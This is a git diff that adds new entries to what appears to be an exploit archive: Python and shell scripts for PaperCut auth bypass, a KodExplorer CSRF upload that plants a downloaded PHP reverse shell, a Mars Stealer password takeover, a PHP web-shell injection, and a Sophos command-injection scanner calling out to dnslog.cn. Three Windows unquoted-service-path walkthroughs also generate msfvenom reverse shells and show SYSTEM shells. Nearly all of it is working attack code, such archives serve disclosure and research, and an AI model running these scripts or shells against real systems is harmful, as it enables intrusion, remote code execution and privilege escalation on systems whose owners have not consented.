diff --git a/exploits/multiple/webapps/51391.py b/exploits/multiple/webapps/51391.py
new file mode 100755
index 000000000..eac9f8c58
--- /dev/null
+++ b/exploits/multiple/webapps/51391.py
@@ -0,0 +1,40 @@
+# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
+# Date: 21 April 2023
+# Exploit Author: MaanVader
+# Vendor Homepage: https://www.papercut.com/
+# Version: 8.0 or later
+# Tested on: 22.0.4
+# CVE: CVE-2023-27350
+
+import requests
+from bs4 import BeautifulSoup
+import re
+
+def vuln_version():
+ ip = input("Enter the ip address: ")
+ url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
+ response = requests.get(url)
+ soup = BeautifulSoup(response.text, 'html.parser')
+ text_div = soup.find('div', class_='text')
+ product_span = text_div.find('span', class_='product')
+
+ # Search for the first span element containing a version number
+ version_span = None
+ for span in text_div.find_all('span'):
+ version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
+ if version_match:
+ version_span = span
+ break
+
+ if version_span is None:
+ print('Not Vulnerable')
+ else:
+ version_str = version_span.text.strip()
+ print('Version:', version_str)
+ print("Vulnerable version")
+ print(f"Step 1 visit this url first in your browser: {url}")
+ print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
+
+
+if __name__ =="__main__":
+ vuln_version()
\ No newline at end of file
diff --git a/exploits/php/webapps/51388.py b/exploits/php/webapps/51388.py
new file mode 100755
index 000000000..2279f1fbf
--- /dev/null
+++ b/exploits/php/webapps/51388.py
@@ -0,0 +1,122 @@
+# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
+# Date: 21/04/2023
+# Exploit Author: MrEmpy
+# Software Link: https://github.com/kalcaddle/KodExplorer
+# Version: <= 4.49
+# Tested on: Linux
+# CVE ID: CVE-2022-4944
+# References:
+# * https://vuldb.com/?id.227000
+# * https://www.cve.org/CVERecord?id=CVE-2022-4944
+# * https://github.com/MrEmpy/CVE-2022-4944
+
+import argparse
+import http.server
+import socketserver
+import os
+import threading
+import requests
+from time import sleep
+
+def banner():
+ print('''
+ _ _____________ _____ _ ______ _____
+ _____
+| | / / _ | _ \ ___| | | | ___ \/ __ \|
+ ___|
+| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/|
+|__
+| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | |
+ __|
+| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\|
+|___
+\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_|
+\____/\____/
+ | |
+
+ |_|
+
+ [KODExplorer <= v4.49 Remote Code Executon]
+ [Coded by MrEmpy]
+
+''')
+
+def httpd():
+ port = 8080
+ httpddir = os.path.join(os.path.dirname(__file__), 'http')
+ os.chdir(httpddir)
+ Handler = http.server.SimpleHTTPRequestHandler
+ httpd = socketserver.TCPServer(('', port), Handler)
+ print('[+] HTTP Server started')
+ httpd.serve_forever()
+
+
+def webshell(url, lhost):
+ payload = ''
+ path = '/data/User/admin/home/'
+
+ targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
+ wshell_f = open('http/shell.php', 'w')
+ wshell_f.write(payload)
+ wshell_f.close()
+ print('[*] Opening HTTPd port')
+ th = threading.Thread(target=httpd)
+ th.start()
+ print(f'[+] Send this URI to your target:
+{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
+{lhost}:8080/shell.php&uuid=&time=')
+ print(f'[+] After the victim opens the URI, his shell will be hosted at
+{url}/data/User/admin/home/shell.php?cmd=whoami')
+
+def reverseshell(url, lhost):
+ rvpayload = '
+https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
+'
+ path = '/data/User/admin/home/'
+
+ targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
+ lport = input('[*] Your local port: ')
+ reqpayload = requests.get(rvpayload).text
+ reqpayload = reqpayload.replace('127.0.0.1', lhost)
+ reqpayload = reqpayload.replace('1234', lport)
+ wshell_f = open('http/shell.php', 'w')
+ wshell_f.write(reqpayload)
+ wshell_f.close()
+ print('[*] Opening HTTPd port')
+ th = threading.Thread(target=httpd)
+ th.start()
+ print(f'[+] Send this URI to your target:
+{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
+{lhost}:8080/shell.php&uuid=&time=')
+ input(f'[*] Run the command "nc -lnvp {lport}" to receive the
+connection and press any key\n')
+ while True:
+ hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
+ sleep(1)
+ if not hitshell.status_code == 200:
+ continue
+ else:
+ print('[+] Shell sent and executed!')
+ break
+
+
+def main(url, lhost, mode):
+ banner()
+ if mode == 'webshell':
+ webshell(url, lhost)
+ elif mode == 'reverse':
+ reverseshell(url, lhost)
+ else:
+ print('[-] There is no such mode. Use webshell or reverse')
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-u','--url', action='store', help='target url',
+dest='url', required=True)
+ parser.add_argument('-lh','--local-host', action='store', help='local
+host', dest='lhost', required=True)
+ parser.add_argument('-m','--mode', action='store', help='mode
+(webshell, reverse)', dest='mode', required=True)
+ arguments = parser.parse_args()
+ main(arguments.url, arguments.lhost, arguments.mode)
\ No newline at end of file
diff --git a/exploits/php/webapps/51392.py b/exploits/php/webapps/51392.py
new file mode 100755
index 000000000..8e1b75fd1
--- /dev/null
+++ b/exploits/php/webapps/51392.py
@@ -0,0 +1,27 @@
+# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
+# Product: Mars Stelaer
+# Technology: PHP
+# Version: < 8.3
+# Google Dork: N/A
+# Date: 20.04.2023
+# Tested on: Linux
+# Author: Sköll - twitter.com/s_k_o_l_l
+
+
+import argparse
+import requests
+
+parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
+parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')
+args = parser.parse_args()
+
+url = args.url.rstrip('/') + '/includes/settingsactions.php'
+headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
+data = {"func": "savepwd", "pwd": "sköll"} #change password
+response = requests.post(url, headers=headers, data=data)
+
+if response.status_code == 200:
+ print("Succesfull!")
+ print("New Password: " + data["pwd"])
+else:
+ print("Exploit Failed!")
\ No newline at end of file
diff --git a/exploits/php/webapps/51394.py b/exploits/php/webapps/51394.py
new file mode 100755
index 000000000..92a80cbac
--- /dev/null
+++ b/exploits/php/webapps/51394.py
@@ -0,0 +1,28 @@
+# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
+# Date: 4/23/2023
+# Author: Or4nG.M4n
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: windows
+#
+# Vuln File : SystemSettings.php < here you can inject php code
+# if(isset($_POST['content'])){
+# foreach($_POST['content'] as $k => $v)
+# file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want
+# }
+# Vuln File : home.php < here you can include and execute you're php code
+# Welcome
+#
+#
+# <=== include
+#
+
+import requests
+
+url = input("Enter url :")
+postdata = {'content[welcome]':'"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'}
+resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
+print("[+] injection in welcome page")
+print("[+]"+url+"/?cmd=ls -al")
+print("\n")
\ No newline at end of file
diff --git a/exploits/php/webapps/51396.sh b/exploits/php/webapps/51396.sh
new file mode 100755
index 000000000..01f9573e6
--- /dev/null
+++ b/exploits/php/webapps/51396.sh
@@ -0,0 +1,94 @@
+#!/bin/bash
+# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
+# Exploit Author: Behnam Abasi Vanda
+# Vendor Homepage: https://www.sophos.com
+# Version: Sophos Web Appliance older than version 4.3.10.4
+# Tested on: Ubuntu
+# CVE : CVE-2023-1671
+# Shodan Dork: title:"Sophos Web Appliance"
+# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
+# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
+
+
+
+TARGET_LIST="$1"
+
+# =====================
+BOLD="\033[1m"
+RED="\e[1;31m"
+GREEN="\e[1;32m"
+YELLOW="\e[1;33m"
+BLUE="\e[1;34m"
+NOR="\e[0m"
+# ====================
+
+
+get_new_subdomain()
+{
+cat MN.txt | grep 'YES' >/dev/null;ch=$?
+ if [ $ch -eq 0 ];then
+ echo -e " [+] Trying to get Subdomain $NOR"
+ rm -rf cookie.txt
+ sub=`curl -i -c cookie.txt -s -k -X $'GET' \
+ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
+ $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
+ echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"
+ fi
+}
+
+check_vuln()
+{
+curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
+
+req=`curl -i -s -k -b cookie.txt -X $'GET' \
+ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
+ $'http://www.dnslog.cn/getrecords.php?t=0'`
+
+echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?
+ if [ $ch -eq 0 ];then
+ echo "YES" > MN.txt
+ echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
+ echo "https://$1" >> vulnerable.lst
+ else
+ echo -e " [-] https://$1 Not Vulnerable :| $NOR"
+ echo "NO" > MN.txt
+ fi
+}
+
+echo '
+
+ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗
+██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║
+██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝
+██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝
+╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║
+ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝
+
+██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗
+██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗
+██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║
+██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║
+██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝
+╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
+
+ '
+if test "$#" -ne 1; then
+ echo " ----------------------------------------------------------------"
+ echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
+ echo " ---------------------------------------------------------------"
+ exit
+fi
+
+
+
+rm -rf cookie.txt
+echo "YES" > MN.txt
+for target in `cat $TARGET_LIST`
+do
+
+get_new_subdomain;
+echo " [~] Checking $target"
+ check_vuln "$target"
+done
+rm -rf MN.txt
+rm -rf cookie.txt
\ No newline at end of file
diff --git a/exploits/windows/local/51389.txt b/exploits/windows/local/51389.txt
new file mode 100644
index 000000000..19723bdce
--- /dev/null
+++ b/exploits/windows/local/51389.txt
@@ -0,0 +1,84 @@
+#####################################################################
+# #
+# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #
+# Date: 2023/04/21 #
+# Exploit Author: msd0pe #
+# Vendor Homepage: https://oscinventory-ng.org #
+# Software Link: https://github.com/OCSInventory-NG/WindowsAgent #
+# My Github: https://github.com/msd0pe-1 #
+# Fixed in version 2.3.1.0 #
+# #
+#####################################################################
+
+OCS Inventory NG Windows Agent:
+Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
+
+[1] Find the unquoted service path:
+ > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto
+
+[2] Get informations about the service:
+ > sc qc "OCS Inventory Service"
+
+ [SC] QueryServiceConfig SUCCESS
+
+ SERVICE_NAME: OCS Inventory Service
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : OCS Inventory Service
+ DEPENDENCIES : RpcSs
+ : EventLog
+ : Winmgmt
+ : Tcpip
+ SERVICE_START_NAME : LocalSystem
+
+[3] Generate a reverse shell:
+ > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
+
+[4] Upload the revese shell to C:\Program Files (x86)\OCS.exe
+ > put OCS.exe
+ > ls
+ drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .
+ drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files
+ -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
+ drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
+ drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
+ drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent
+ -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe
+ drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender
+ drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail
+ drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
+ drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
+
+[5] Start listener
+ > nc -lvp 4444
+
+[6] Reboot the service/server
+ > sc stop "OCS Inventory Service"
+ > sc start "OCS Inventory Service"
+
+ OR
+
+ > shutdown /r
+
+[7] Enjoy !
+ 192.168.1.102: inverse host lookup failed: Unknown host
+ connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
+ Microsoft Windows [Version 10.0.19045.2130]
+ (c) Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/51393.txt b/exploits/windows/local/51393.txt
new file mode 100644
index 000000000..9f7c6403d
--- /dev/null
+++ b/exploits/windows/local/51393.txt
@@ -0,0 +1,80 @@
+##########################################################################
+# #
+# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #
+# Date: 2023/04/22 #
+# Exploit Author: msd0pe #
+# Vendor Homepage: https://www.arcsoft.com/ #
+# My Github: https://github.com/msd0pe-1 #
+# #
+##########################################################################
+
+Arcsoft PhotoStudio:
+Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.
+
+[1] Find the unquoted service path:
+ > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+ ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto
+
+[2] Get informations about the service:
+ > sc qc "ADExchange"
+
+ [SC] QueryServiceConfig SUCCESS
+
+ SERVICE_NAME: ADExchange
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ArcSoft Exchange Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+[3] Generate a reverse shell:
+ > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
+
+[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
+ > put Commom.exe
+ > ls
+ drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .
+ drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..
+ drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft
+ drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files
+ -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe
+ -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
+ drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information
+ drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
+ drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
+ drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender
+ drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail
+ drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
+ drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
+ drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
+
+[5] Start listener
+ > nc -lvp 4444
+
+[6] Reboot the service/server
+ > sc stop "ADExchange"
+ > sc start "ADExchange"
+
+ OR
+
+ > shutdown /r
+
+[7] Enjoy !
+ 192.168.1.102: inverse host lookup failed: Unknown host
+ connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
+ Microsoft Windows [Version 10.0.19045.2130]
+ (c) Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+
+ nt authority\system
\ No newline at end of file
diff --git a/exploits/windows/local/51395.txt b/exploits/windows/local/51395.txt
new file mode 100644
index 000000000..d3f4ffe6f
--- /dev/null
+++ b/exploits/windows/local/51395.txt
@@ -0,0 +1,69 @@
+############################################################################
+# #
+# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #
+# Date: 2023/04/23 #
+# Exploit Author: msd0pe #
+# Vendor Homepage: https://www.wondershare.com #
+# My Github: https://github.com/msd0pe-1 #
+# #
+############################################################################
+
+Wondershare Filmora:
+Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.
+
+[1] Find the unquoted service path:
+ > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto
+
+[2] Get informations about the service:
+ > sc qc "NativePushService"
+
+ [SC] QueryServiceConfig SUCCESS
+
+ SERVICE_NAME: NativePushService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Wondershare Native Push Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+[3] Generate a reverse shell:
+ > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe
+
+[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
+ > put Wondershare.exe
+ > ls
+ drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .
+ drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..
+ drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
+ drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush
+ -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe
+ drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper
+
+
+[5] Start listener
+ > nc -lvp 4444
+
+[6] Reboot the service/server
+ > sc stop "NativePushService"
+ > sc start "NativePushService"
+
+ OR
+
+ > shutdown /r
+
+[7] Enjoy !
+ 192.168.1.102: inverse host lookup failed: Unknown host
+ connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
+ Microsoft Windows [Version 10.0.19045.2130]
+ (c) Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+
+ nt authority\system
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b5ab33323..b69192352 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -12003,6 +12003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
+51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@@ -22061,6 +22062,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28318,exploits/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php,,2006-08-01,2013-09-16,1,CVE-2006-3982;OSVDB-29077,,,,,https://www.securityfocus.com/bid/19271/info
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
+51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@@ -22887,6 +22889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
13927,exploits/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,webapps,php,,2010-06-17,,0,,,,,,
26838,exploits/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4288;OSVDB-21902,,,,,https://www.securityfocus.com/bid/15875/info
26841,exploits/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4287;OSVDB-21903,,,,,https://www.securityfocus.com/bid/15877/info
+51392,exploits/php/webapps/51392.py,"Mars Stealer 8.3 - Admin Account Takeover",2023-04-25,Sköll,webapps,php,,2023-04-25,2023-04-25,0,,,,,,
26899,exploits/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php,,2005-12-19,2013-07-17,1,CVE-2005-4403;OSVDB-21831,,,,,https://www.securityfocus.com/bid/15959/info
11329,exploits/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,webapps,php,,2010-02-03,,1,OSVDB-62133;CVE-2010-1047,,,,,
32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php,,2009-01-15,2014-04-08,1,OSVDB-105743,,,,,https://www.securityfocus.com/bid/33309/info
@@ -23530,6 +23533,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,webapps,php,,2010-04-13,,1,,,,,,
5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,webapps,php,,2008-05-14,,1,OSVDB-45336;CVE-2008-2293,,,,,
50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
+51394,exploits/php/webapps/51394.py,"Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution",2023-04-25,Or4nG.M4N,webapps,php,,2023-04-25,2023-04-25,0,,,,,,
